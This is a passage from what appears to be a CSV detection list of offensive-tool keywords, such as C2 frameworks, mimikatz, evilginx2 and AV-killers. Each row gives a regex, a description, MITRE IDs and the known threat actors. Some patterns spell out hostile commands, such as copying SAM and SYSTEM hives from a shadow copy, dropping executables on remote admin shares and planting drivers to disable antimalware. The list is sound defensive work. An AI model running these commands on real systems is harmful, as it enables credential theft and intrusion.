and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38864" "*Cooolis-msX64.zip*",".{0,1000}Cooolis\-msX64\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38865" "*Cooolis-msX86.zip*",".{0,1000}Cooolis\-msX86\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38866" "*Cooolis-Reflective*",".{0,1000}Cooolis\-Reflective.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38867" "*Cooolis-Shellcode*",".{0,1000}Cooolis\-Shellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38868" "*Cooolis-String.*",".{0,1000}Cooolis\-String\..{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38869" "*CooolisVirtualAlloc*",".{0,1000}CooolisVirtualAlloc.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38870" "*copy *.exe \\*\c$\Windows\foxprow.exe*",".{0,1000}copy\s.{0,1000}\.exe\s\\\\.{0,1000}\\c\$\\Windows\\foxprow\.exe.{0,1000}","offensive_tool_keyword","copy","DCOM Lateral Movement technique leveraging Excel and ActivateMicrosoftApp works.","T1021.003 - T1566.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://x.com/ACEResponder/status/1720906842631549377","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38872" "*copy *\legit.sys *Windows\System32\Drivers\*.sys*",".{0,1000}copy\s.{0,1000}\\legit\.sys\s.{0,1000}Windows\\System32\\Drivers\\.{0,1000}\.sys.{0,1000}","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","N/A","10","4","358","81","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z","38873" "*copy 
*PROCEXP.sys*C:\Windows\System32\WindowsPowershell\*",".{0,1000}copy\s.{0,1000}PROCEXP\.sys.{0,1000}C\:\\Windows\\System32\\WindowsPowershell\\.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","Black Basta","Credential Access","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","38876" "*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\*",".{0,1000}copy\s\\.{0,1000}\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam\sC\:\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38879" "*copy \*\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\*",".{0,1000}copy\s\\.{0,1000}\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system\sC\:\\.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. 
An elevated prompt is required for this.","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38880" "*COPY anyproxy/ ./anyproxy/*",".{0,1000}COPY\sanyproxy\/\s\.\/anyproxy\/.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","#linux","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","38881" "*copy Tsutsuji_x64.dll %appdata%*Local\Microsoft\WindowsApps\BluetoothDiagnosticUtil.dll*",".{0,1000}copy\sTsutsuji_x64\.dll\s\%appdata\%.{0,1000}Local\\Microsoft\\WindowsApps\\BluetoothDiagnosticUtil\.dll.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","38884" "*CopyAndPasteEnum.bat*",".{0,1000}CopyAndPasteEnum\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","38886" 
"*CopyAndPasteFileDownloader.bat*",".{0,1000}CopyAndPasteFileDownloader\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","38887" "*Copy-Item -Path * -Destination \\$IP\transfer*",".{0,1000}Copy\-Item\s\-Path\s.{0,1000}\s\-Destination\s\\\\\$IP\\transfer.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","38889" "*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*",".{0,1000}Copyright\s\(c\)\s2007\s\-\s2021\sgentilkiwi\s\(Benjamin\sDELPY\).{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","38890" "*Copyright (c) 2023 whoamianony.top*",".{0,1000}Copyright\s\(c\)\s2023\swhoamianony\.top.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","38891" "*cordyceps.exe*",".{0,1000}cordyceps\.exe.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","N/A","10","","N/A","","","","38892" "*Cordyceps-main.zip*",".{0,1000}Cordyceps\-main\.zip.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting 
dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","N/A","10","","N/A","","","","38893" "*core/handler/reverse*",".{0,1000}core\/handler\/reverse.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38894" "*core/http_proxy.go*",".{0,1000}core\/http_proxy\.go.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","1","N/A","False positives 
expected","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","38895" "*core/sprayers/lync.py*",".{0,1000}core\/sprayers\/lync\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","38896" "*core/teamserver/stagers/*",".{0,1000}core\/teamserver\/stagers\/.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","38897" "*coreImplantFlags binds all flags common to all sliver implant types*",".{0,1000}coreImplantFlags\sbinds\sall\sflags\scommon\sto\sall\ssliver\simplant\stypes.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38898" "*CoreSecurity/impacket/*",".{0,1000}CoreSecurity\/impacket\/.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - 
TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","38899" "*corrupt data that was marshalled by Ndr64ConformantVaryingArrayMarshall*",".{0,1000}corrupt\sdata\sthat\swas\smarshalled\sby\sNdr64ConformantVaryingArrayMarshall.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","0","#content","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","38900" "*corscanner -i urls.txt -t 100*",".{0,1000}corscanner\s\-i\surls\.txt\s\-t\s100.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38901" "*Could not find address marker in shellcode*",".{0,1000}Could\snot\sfind\saddress\smarker\sin\sshellcode.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#content","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","38902" "*Could not parse .dmp file with pypykatz*",".{0,1000}Could\snot\sparse\s\.dmp\sfile\swith\spypykatz.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - 
T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","38903" "*Could not run AMSI bypass.*",".{0,1000}Could\snot\srun\sAMSI\sbypass\..{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfiltration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#content","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","38904" "*Could not spoof binary: *",".{0,1000}Could\snot\sspoof\sbinary\:\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","38905" "*Could not write NTLM Hashes to the specified JTR_Dump_Path *",".{0,1000}Could\snot\swrite\sNTLM\sHashes\sto\sthe\sspecified\sJTR_Dump_Path\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","38906" "*Could not write NTLM Hashes to the specified JTR_Dump_Path*",".{0,1000}Could\snot\swrite\sNTLM\sHashes\sto\sthe\sspecified\sJTR_Dump_Path.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege
Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","38907" "*Couldn't clone GPO {} (maybe it does not exist?*",".{0,1000}Couldn\'t\sclone\sGPO\s\{\}\s\(maybe\sit\sdoes\snot\sexist\?.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","38908" "*Covenant.API*",".{0,1000}Covenant\.API.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38909" "*Covenant.csproj*",".{0,1000}Covenant\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38910" "*Covenant.exe*",".{0,1000}Covenant\.exe.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38911" "*Covenant.Models*",".{0,1000}Covenant\.Models.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38912" "*Covenant.sln*",".{0,1000}Covenant\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38913" "*Covenant/Covenant*",".{0,1000}Covenant\/Covenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - 